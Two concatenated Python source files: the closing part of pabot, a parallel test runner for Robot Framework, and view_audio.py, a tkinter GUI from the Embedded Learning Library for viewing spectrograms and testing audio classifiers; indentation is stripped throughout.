if _is_output_coloring_supported() and color:
return "%s%s%s" % (color, message, Color.ENDC)
return message
def _is_output_coloring_supported():
return sys.stdout.isatty() and os.name in Color.SUPPORTED_OSES
def _start_message_writer():
t = threading.Thread(target=_writer)
t.start()
def _stop_message_writer():
MESSAGE_QUEUE.put(None)
MESSAGE_QUEUE.join()
def _start_remote_library(pabot_args): # type: (dict) -> Optional[subprocess.Popen]
global _PABOTLIBURI
_PABOTLIBURI = "%s:%s" % (pabot_args["pabotlibhost"], pabot_args["pabotlibport"])
if not pabot_args["pabotlib"]:
return None
if pabot_args.get("resourcefile") and not os.path.exists(
pabot_args["resourcefile"]
):
_write(
"Warning: specified resource file doesn't exist."
" Some tests may fail or continue forever.",
Color.YELLOW,
)
pabot_args["resourcefile"] = None
return subprocess.Popen(
'"{python}" -m {pabotlibname} {resourcefile} {pabotlibhost} {pabotlibport}'.format(
python=sys.executable,
pabotlibname=pabotlib.__name__,
resourcefile=pabot_args.get("resourcefile"),
pabotlibhost=pabot_args["pabotlibhost"],
pabotlibport=pabot_args["pabotlibport"],
),
shell=True,
)
def _stop_remote_library(process): # type: (subprocess.Popen) -> None
_write("Stopping PabotLib process")
try:
remoteLib = Remote(_PABOTLIBURI)
remoteLib.run_keyword("stop_remote_libraries", [], {})
remoteLib.run_keyword("stop_remote_server", [], {})
except RuntimeError:
_write("Could not connect to PabotLib - assuming stopped already")
return
i = 50
while i > 0 and process.poll() is None:
time.sleep(0.1)
i -= 1
if i == 0:
_write(
"Could not stop PabotLib Process in 5 seconds " "- calling terminate",
Color.YELLOW,
)
process.terminate()
else:
_write("PabotLib process stopped")
def _get_suite_root_name(suite_names):
top_names = [x.top_name() for group in suite_names for x in group]
if top_names and top_names.count(top_names[0]) == len(top_names):
return top_names[0]
return ""
class QueueItem(object):
_queue_index = 0
def __init__(
self,
datasources,
outs_dir,
options,
execution_item,
command,
verbose,
argfile,
hive=None,
processes=0,
):
# type: (List[str], str, Dict[str, object], ExecutionItem, List[str], bool, Tuple[str, Optional[str]], Optional[str], int) -> None
self.datasources = datasources
self.outs_dir = (
outs_dir.encode("utf-8") if PY2 and is_unicode(outs_dir) else outs_dir
)
self.options = options
self.execution_item = (
execution_item if not hive else HivedItem(execution_item, hive)
)
self.command = command
self.verbose = verbose
self.argfile_index = argfile[0]
self.argfile = argfile[1]
self._index = QueueItem._queue_index
QueueItem._queue_index += 1
self.last_level = None
self.hive = hive
self.processes = processes
@property
def index(self):
# type: () -> int
return self._index
@property
def display_name(self):
# type: () -> str
if self.argfile:
return "%s {%s}" % (self.execution_item.name, self.argfile)
return self.execution_item.name
def _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
is_dry_run = (
options.get("dryrun")
if ROBOT_VERSION >= "2.8"
else options.get("runmode") == "DryRun"
)
if is_dry_run:
all_items = _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
)
else:
all_items = _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
_construct_index_and_completed_index(all_items)
_construct_last_levels(all_items)
return all_items
def _construct_index_and_completed_index(all_items):
# type: (List[List[QueueItem]]) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
for item_group in all_items:
for item in item_group:
_NOT_COMPLETED_INDEXES.append(item.index)
def _create_execution_items_for_run(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
for suite_group in suite_names:
# TODO: Fix this better
if (
options.get("randomize") in ["all", "suites"]
and "suitesfrom" not in pabot_args
):
random.shuffle(suite_group)
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
all_items.append(items)
return all_items
def _create_items(datasources, opts_for_run, outs_dir, pabot_args, suite_group):
return [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
argfile,
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
for argfile in pabot_args["argumentfiles"] or [("", None)]
]
def _create_execution_items_for_dry_run(
suite_names, datasources, outs_dir, opts_for_run, pabot_args
):
global _NUMBER_OF_ITEMS_TO_BE_EXECUTED
all_items = [] # type: List[List[QueueItem]]
_NUMBER_OF_ITEMS_TO_BE_EXECUTED = 0
processes_count = pabot_args["processes"]
for suite_group in suite_names:
items = _create_items(
datasources, opts_for_run, outs_dir, pabot_args, suite_group
)
chunk_size = (
round(len(items) / processes_count)
if len(items) > processes_count
else len(items)
)
chunked_items = list(_chunk_items(items, chunk_size))
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(chunked_items)
all_items.append(chunked_items)
return all_items
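# In dry-run mode the individual items are batched into SuiteItems chunks,
# roughly one chunk per worker process; _chunk_items yields one combined
# QueueItem per chunk.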
def _chunk_items(items, chunk_size):
for i in range(0, len(items), chunk_size):
chunked_items = items[i : i + chunk_size]
base_item = chunked_items[0]
if not base_item:
continue
execution_items = SuiteItems([item.execution_item for item in chunked_items])
chunked_item = QueueItem(
base_item.datasources,
base_item.outs_dir,
base_item.options,
execution_items,
base_item.command,
base_item.verbose,
(base_item.argfile_index, base_item.argfile),
processes=base_item.processes,
)
yield chunked_item
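# Determine the deepest dotted suite prefix of `name` that no later name in
# `group` shares, i.e. the suite level that ends once this item completes.
# If a later name is a prefix or extension of `name`, return
# name + ".PABOT_noend" to mark that no suite ends here.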
def _find_ending_level(name, group):
n = name.split(".")
level = -1
for other in group:
o = other.split(".")
dif = [i for i in range(min(len(o), len(n))) if o[i] != n[i]]
if dif:
level = max(dif[0], level)
else:
return name + ".PABOT_noend"
return ".".join(n[: (level + 1)])
def _construct_last_levels(all_items):
names = []
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
names.append(suite.name)
else:
names.append(item.execution_item.name)
for items in all_items:
for item in items:
if isinstance(item.execution_item, SuiteItems):
for suite in item.execution_item.suites:
item.last_level = _find_ending_level(
suite.name, names[item.index + 1 :]
)
else:
item.last_level = _find_ending_level(
item.execution_item.name, names[item.index + 1 :]
)
def _initialize_queue_index():
global _PABOTLIBURI
plib = Remote(_PABOTLIBURI)
# INITIALISE PARALLEL QUEUE MIN INDEX
for i in range(300):
try:
plib.run_keyword(
"set_parallel_value_for_key",
[pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE, 0],
{},
)
return
except RuntimeError as e:
# REMOTE LIB NOT YET CONNECTED
time.sleep(0.1)
raise RuntimeError("Can not connect to PabotLib at %s" % _PABOTLIBURI)
def _add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
):
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
if not _pabotlib_in_use():
return
plib = Remote(_PABOTLIBURI)
new_suites = plib.run_keyword("get_added_suites", [], {})
if len(new_suites) == 0:
return
suite_group = [DynamicSuiteItem(s, v) for s, v in new_suites]
items = [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
("", None),
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
]
with _COMPLETED_LOCK:
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
for item in items:
_NOT_COMPLETED_INDEXES.append(item.index)
execution_items.insert(0, items)
def main(args=None):
global _PABOTLIBPROCESS
args = args or sys.argv[1:]
if len(args) == 0:
print(
"[ "
+ _wrap_with(Color.RED, "ERROR")
+ " ]: Expected at least 1 argument, got 0."
)
print("Try --help for usage information.")
sys.exit(252)
start_time = time.time()
start_time_string = _now()
# NOTE: timeout option
try:
_start_message_writer()
options, datasources, pabot_args, opts_for_run = parse_args(args)
if pabot_args["help"]:
print(__doc__)
sys.exit(0)
if len(datasources) == 0:
print("[ " + _wrap_with(Color.RED, "ERROR") + " ]: No datasources given.")
print("Try --help for usage information.")
sys.exit(252)
_PABOTLIBPROCESS = _start_remote_library(pabot_args)
if _pabotlib_in_use():
_initialize_queue_index()
outs_dir = _output_dir(options)
suite_names = solve_suite_names(outs_dir, datasources, options, pabot_args)
if pabot_args["verbose"]:
_write("Suite names resolved in %s seconds" % str(time.time() - start_time))
ordering = pabot_args.get("ordering")
if ordering:
suite_names = _preserve_order(suite_names, ordering)
suite_names = _group_by_wait(_group_by_groups(suite_names))
if not suite_names or suite_names == [[]]:
_write("No tests to execute")
if not options.get("runemptysuite", False):
sys.exit(252)
execution_items = _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
while execution_items:
items = execution_items.pop(0)
_parallel_execute(items, pabot_args["processes"])
_add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
)
result_code = _report_results(
outs_dir,
pabot_args,
options,
start_time_string,
_get_suite_root_name(suite_names),
)
sys.exit(result_code if not _ABNORMAL_EXIT_HAPPENED else 252)
except Information as i:
print(__doc__)
print(i.message)
except DataError as err:
print(err.message)
sys.exit(252)
except Exception:
_write("[ERROR] EXCEPTION RAISED DURING PABOT EXECUTION", Color.RED)
_write(
"[ERROR] PLEASE CONSIDER REPORTING THIS ISSUE TO https://github.com/mkorpela/pabot/issues",
Color.RED,
)
raise
finally:
if _PABOTLIBPROCESS:
_stop_remote_library(_PABOTLIBPROCESS)
_print_elapsed(start_time, time.time())
_stop_message_writer()
if __name__ == "__main__":
main()
|
view_audio.py
|
#!/usr/bin/env python3
###################################################################################################
#
# Project: Embedded Learning Library (ELL)
# File: view_audio.py
# Authors: Chris Lovett, Chuck Jacobs
#
# Requires: Python 3.x, numpy, tkinter, matplotlib
#
###################################################################################################
import argparse
import json
import os
from threading import Thread, Lock, get_ident
import sys
import tkinter as tk
from tkinter import BOTH, RIGHT, TOP, X, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
# local modules
import classifier
import featurizer
import microphone
import speaker
import wav_reader
import vad
script_dir = os.path.dirname(os.path.abspath(__file__))
sys.path += [os.path.join(script_dir, "training")]
import make_vad
class SpectrogramImage(Frame):
""" A tkinter scrolling spectrogram widget """
def __init__(self, master, colormap_name="inferno"):
self.colormap_name = colormap_name
super(SpectrogramImage, self).__init__(master)
self.features_figure = Figure(figsize=(5, 4), dpi=100)
self.subplot = self.features_figure.add_subplot(111)
self.data_shape = None
canvas = FigureCanvasTkAgg(self.features_figure, master=self)
canvas.draw()
canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
def begin_animation(self, func):
# (30 fps is usually fine)
return animation.FuncAnimation(self.features_figure, func, interval=33, blit=True)
def clear(self, data):
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(data, vmin=0,
vmax=1, origin="lower", animated=True,
cmap=pyplot.get_cmap(self.colormap_name))
def show(self, data):
""" the result of this function is an image object that is animatable """
if self.data_shape != data.shape or self.spectrogram_image is None:
self.clear(data)
else:
min_value = np.min(data)
max_value = np.max(data)
if not np.isfinite(min_value):
min_value = 0
if not np.isfinite(max_value):
max_value = 1
eps = 0.1
if max_value - min_value < eps:
max_value = min_value + eps
self.spectrogram_image.set_clim(min_value, max_value)
self.spectrogram_image.set_data(data)
self.data_shape = data.shape
return self.spectrogram_image
class AudioDemo(Frame):
""" A demo application class that provides simple GUI for testing featurizer+classifier on
microphone or wav file input. """
def __init__(self, featurizer_model=None, classifier_model=None, auto_scale=True,
sample_rate=None, channels=None, input_device=None, categories=None,
image_width=80, threshold=None, wav_file=None, clear=5, serial=None, vad_model=None,
smoothing=None, ignore_list=None):
""" Initialize AudioDemo object
featurizer_model - the path to the ELL featurizer
classifier_model - the path to the ELL classifier
auto_scale - auto scale audio input to range [-1, 1]
        sample_rate - sample rate the featurizer is expecting
        channels - number of channels the featurizer is expecting
input_device - optional id of microphone to use
categories - path to file containing category labels
image_width - width of the spectrogram image
threshold - ignore predictions that have confidence below this number (e.g. 0.5)
wav_file - optional wav_file to use when you click Play
serial - optional serial input, reading numbers from the given serial port.
vad_model - optional ELL model containing VoiceActivityDetector
smoothing - controls the size of the smoothing window (defaults to 0).
ignore_list - list of category labels to ignore (like 'background' or 'silence')
"""
super().__init__()
self.CLASSIFIER_MODEL_KEY = "classifier_model"
self.FEATURIZER_MODEL_KEY = "featurizer_model"
self.WAV_FILE_KEY = "wav_file"
self.CATEGORY_FILE_KEY = "categories"
self.get_settings_file_name()
self.load_settings()
self.reading_input = False
self.featurizer_model = None
self.serial_port = serial
self.smoothing = smoothing
self.ignore_list = ignore_list
if featurizer_model:
self.featurizer_model = featurizer_model
self.settings[self.FEATURIZER_MODEL_KEY] = featurizer_model
elif self.FEATURIZER_MODEL_KEY in self.settings:
self.featurizer_model = self.settings[self.FEATURIZER_MODEL_KEY]
self.classifier_model = None
if classifier_model:
self.classifier_model = classifier_model
self.settings[self.CLASSIFIER_MODEL_KEY] = classifier_model
elif self.CLASSIFIER_MODEL_KEY in self.settings:
self.classifier_model = self.settings[self.CLASSIFIER_MODEL_KEY]
self.vad = None
if vad_model:
self.vad = vad.VoiceActivityDetector(vad_model)
self.previous_vad = 0
self.wav_filename = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.auto_scale = auto_scale
self.sample_rate = sample_rate if sample_rate is not None else 16000
self.channels = channels if channels is not None else 1
self.input_device = input_device
self.num_classifier_features = None
self.vad = None
self.vad_reset = (vad_model is not None)
self.previous_vad = 0
self.vad_latch = 3 # only reset after 3 vad=0 signals to smooth vad signal a bit.
if not categories and self.CATEGORY_FILE_KEY in self.settings:
categories = self.settings[self.CATEGORY_FILE_KEY]
self.categories = categories
if categories:
self.settings[self.CATEGORY_FILE_KEY] = categories
self.save_settings() # in case we just changed it.
self.audio_level = 0
self.min_level = 0
self.max_level = 0
self.threshold = threshold
self.output_clear_time = int(clear * 1000) if clear else 5000
self.featurizer = None
self.classifier = None
self.wav_file = None
self.speaker = None
self.microphone = None
self.animation = None
self.show_classifier_output = True
self.last_prediction = None
self.probability = 0
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
# UI components
self.max_spectrogram_width = image_width
self.features_entry = None
self.classifier_feature_data = None
self.spectrogram_image_data = None
self.init_ui()
if self.featurizer_model:
self.load_featurizer_model(os.path.abspath(self.featurizer_model))
else:
self.show_output("Please specify and load a feature model")
if smoothing == "vad":
# smooth up to 1 second worth of predictions
self.smoothing = int(self.sample_rate / self.featurizer.input_size)
if vad_model is None:
vad_model = make_vad.make_vad("vad.ell", self.sample_rate, self.featurizer.input_size,
self.featurizer.output_size, None)
if self.classifier_model:
self.load_classifier(self.classifier_model)
self.setup_spectrogram_image()
else:
self.show_output("Please specify and load a classifier model")
if vad_model:
self.vad = vad.VoiceActivityDetector(vad_model)
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "viewaudio.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
print("loading settings from: {}".format(self.settings_file_name))
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
json.dump(self.settings, f, indent=2)
def load_featurizer_model(self, featurizer_model):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_model:
self.featurizer = featurizer.AudioTransform(featurizer_model, 40)
self.setup_spectrogram_image()
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
if self.features_entry.get() != featurizer_model:
self.features_entry.delete(0, END)
self.features_entry.insert(0, featurizer_model)
self.init_data()
def load_classifier(self, classifier_path):
""" load the given compiled ELL classifier for use in processing subsequent audio input """
if classifier_path:
self.classifier = classifier.AudioClassifier(classifier_path, self.categories, self.threshold,
smoothing_window=self.smoothing,
ignore_list=self.ignore_list)
self.show_output("Classifier input size: {}, output size: {}".format(
self.classifier.input_size,
self.classifier.output_size))
if self.classifier_entry.get() != classifier_path:
self.classifier_entry.delete(0, END)
self.classifier_entry.insert(0, classifier_path)
self.init_data()
def init_data(self):
""" initialize the spectrogram_image_data and classifier_feature_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_widget:
self.spectrogram_widget.clear(self.spectrogram_image_data)
if self.classifier:
self.num_classifier_features = self.classifier.input_size // self.featurizer.output_size
dim = (self.num_classifier_features, self.featurizer.output_size)
self.classifier_feature_data = np.zeros(dim, dtype=float)
def accumulate_feature(self, feature_data):
""" accumulate the feature data and pass feature data to classifier """
if self.vad:
vad_signal = self.vad.predict(feature_data)
if self.previous_vad != vad_signal:
if vad_signal == 0:
if self.vad_latch > 0:
# wait for 2 more to smooth the vad signal a bit.
self.vad_latch -= 1
else:
self.vad_latch = 3
self.previous_vad = vad_signal
if self.vad_reset:
self.show_output("--- reset ---")
self.classifier.reset()
else:
self.show_output("--- clear history ---")
self.classifier.clear_smoothing()
elif vad_signal == 1:
self.vad_latch = 3
self.previous_vad = vad_signal
self.audio_level = np.sum([x * x for x in feature_data])
if self.classifier and self.show_classifier_output:
self.classifier_feature_data = np.vstack((self.classifier_feature_data,
feature_data))[-self.num_classifier_features:, :]
self.evaluate_classifier()
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1, 1])
new_image = np.hstack((image_data, feature_data))[:, -image_data.shape[1]:]
image_data[:, :] = new_image
def update_rgb_led(self):
# This helper function uses the RGB led UI to give an indication of audio levels (brightness)
# and voice activity (red)
level = self.audio_level
if level < self.min_level:
self.min_level = level
if level > self.max_level:
self.max_level = level
red = 0.0
green = 0.0
blue = 0.0
range = self.max_level - self.min_level
if range == 0:
range = 1.0
brightness = 128 * (level - self.min_level) / range
if self.previous_vad:
red = brightness + 127
else:
green = brightness + 127
rgb = "#{:02x}{:02x}{:02x}".format(int(red), int(green), int(blue))
self.rgb_canvas.itemconfig(self.rgb_oval, fill=rgb)
def on_ui_update(self):
# this is an animation callback to update the UI every 33 milliseconds.
self.update_rgb_led()
self.process_output()
result = self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (result,)
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
result = self.spectrogram_widget.show(self.spectrogram_image_data)
self.lock.release()
return result
def get_correct_shape(self, shape):
""" for some reason keras stores input shape as (None,80,40), and numpy hates that
so we have to change this to (1,80,40) """
shape = list(shape)
fix = [x if x else 1 for x in shape]
return tuple(fix)
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def evaluate_classifier(self):
""" run the classifier model on the current feature data and show the prediction, if any """
        if self.classifier and self.classifier_feature_data is not None:
prediction, probability, label, _ = self.classifier.predict(self.classifier_feature_data.ravel())
if prediction is not None:
percent = int(100 * probability)
if label == "silence":
self.classifier.reset()
elif self.last_prediction != prediction or self.probability < probability:
self.last_prediction = prediction
self.probability = probability
self.show_output(" DETECTED ({}) {}% {}".format(prediction, percent, label))
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
        wav file and we set up a UI animation function to draw the sliding spectrogram image; this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels, self.auto_scale)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
def update_func(frame_index):
return self.on_ui_update()
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image)
self.animation = self.spectrogram_widget.begin_animation(update_func)
# start background thread to read and classify the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
self.stop()
input_channel = None
if self.serial_port:
import serial_reader
self.serial = serial_reader.SerialReader(0.001)
self.serial.open(self.featurizer.input_size, self.serial_port)
input_channel = self.serial
else:
if self.microphone is None:
self.microphone = microphone.Microphone(auto_scale=self.auto_scale, console=False)
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
input_channel = self.microphone
def update_func(frame_index):
return self.on_ui_update()
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image)
self.animation = self.spectrogram_widget.begin_animation(update_func)
# start background thread to read and classify the recorded audio.
self.featurizer.open(input_channel)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop
and pass it to the classifier """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
self.lock.acquire()
self.accumulate_feature(feature_data)
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
if self.classifier:
self.classifier.reset() # good time to reset.
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
self.last_prediction = None
self.probability = 0
if self.classifier:
self.classifier.reset() # good time to reset.
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stop()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stop()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.stop()
def get_wav_list(self):
if self.wav_filename and os.path.isfile(self.wav_filename):
dir_name = os.path.dirname(self.wav_filename)
if not self.wav_file_list:
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def init_ui(self):
""" setup the GUI for the app """
self.master.title("Test")
self.pack(fill=BOTH, expand=True)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rgb_canvas = tk.Canvas(input_frame, width=20, height=20, bd=0)
self.rgb_oval = self.rgb_canvas.create_oval(2, 2, 20, 20, fill='#FF0000', width=0)
self.rgb_canvas.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
if self.featurizer_model:
self.features_entry.insert(0, self.featurizer_model)
self.spectrogram_widget = SpectrogramImage(features_frame)
self.spectrogram_widget.pack(fill=X)
# Classifier section
classifier_frame = LabelFrame(self, text="Classifier")
classifier_frame.pack(fill=X)
load_classifier_button = Button(classifier_frame, text="Load", command=self.on_load_classifier)
load_classifier_button.pack(side=RIGHT)
self.classifier_entry = Entry(classifier_frame, width=8)
self.classifier_entry.pack(fill=X)
self.classifier_entry.delete(0, END)
if self.classifier_model:
self.classifier_entry.insert(0, self.classifier_model)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def setup_spectrogram_image(self):
""" this needs to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.spectrogram_widget.show(self.spectrogram_image_data)
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.settings[self.FEATURIZER_MODEL_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def on_load_classifier(self):
""" called when user clicks the Load button for the feature model """
self.classifier_model = self.classifier_entry.get()
self.settings[self.CLASSIFIER_MODEL_KEY] = self.classifier_model
self.save_settings()
self.stop()
self.load_classifier(self.classifier_model)
def main(featurizer_model=None, classifier=None, auto_scale=True, sample_rate=None, channels=None, input_device=None,
categories=None, image_width=80, threshold=None, wav_file=None, clear=5, serial=None, vad_model=None,
smoothing=None, ignore_list=None):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = AudioDemo(featurizer_model, classifier, auto_scale, sample_rate, channels, input_device, categories,
image_width, threshold, wav_file, clear, serial, vad_model, smoothing, ignore_list)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features",
default=None)
arg_parser.add_argument("--classifier", "-c", help="Compiled ELL model to use for classification",
default=None)
arg_parser.add_argument("--sample_rate", "-s", help="Audio sample rate expected by classifier",
default=16000, type=int)
arg_parser.add_argument("--channels", "-ch", help="Audio channels expected by classifier",
default=1, type=int)
arg_parser.add_argument("--input_device", "-d", help="Index of input device (see --list_devices)",
default=1, type=int)
arg_parser.add_argument("--list_devices", help="List available input devices", action="store_true")
arg_parser.add_argument("--categories", help="Provide categories file that provide labels for each predicted class")
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test")
arg_parser.add_argument("--image_width", help="Provide the display width of spectrogram image",
type=int, default=80)
arg_parser.add_argument("--threshold", help="Ignore predictions below given confidence threshold (0 to 1)",
type=float, default=0)
arg_parser.add_argument("--clear", help="Seconds before clearing output (default 5)",
type=float, default=5)
arg_parser.add_argument("--serial", help="Name of serial port to read (default None)")
arg_parser.add_argument("--auto_scale", help="Whether to auto scale audio input to range [-1, 1]",
action="store_true")
